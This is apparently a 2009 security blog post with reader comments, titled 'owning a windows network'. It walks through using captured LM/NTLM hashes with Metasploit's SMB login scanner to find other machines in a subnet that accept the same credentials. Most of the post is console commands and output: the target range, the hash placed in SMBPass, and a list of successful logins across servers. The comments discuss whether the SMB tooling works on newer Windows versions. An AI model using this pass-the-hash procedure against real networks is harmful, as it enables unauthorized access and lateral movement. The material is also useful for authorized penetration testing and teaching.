owning a windows network

so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting  Required  Description
—-       —————  ——–  ———–
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6”, “os_name”, “desc”, “created”, “state”) VALUES(‘10.1.1.189’, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ‘2009-11-06 10:48:09’, ‘unknown’)

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

4 Comments

  1. hammackj says:
    November 7, 2009 at 4:19 am

    Have you had any luck with the Metasploit SMB classes against Vista/2008/7? I have been having 100% failure against those with anything SMB, particularly a tool I am writing that uses the Rex SMB API.

    Reply
  2. jcran says:
    November 18, 2009 at 10:21 am

    @hammackj – yep, i’ve had good luck against 2008. what are you having trouble with?

    Reply
  3. n1c0 says:
    January 12, 2010 at 11:02 am

    having luck with windows 7

    Reply
  4. Pingback: Week 45 in Review – 2009 | Infosec Events

Leave a Comment

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s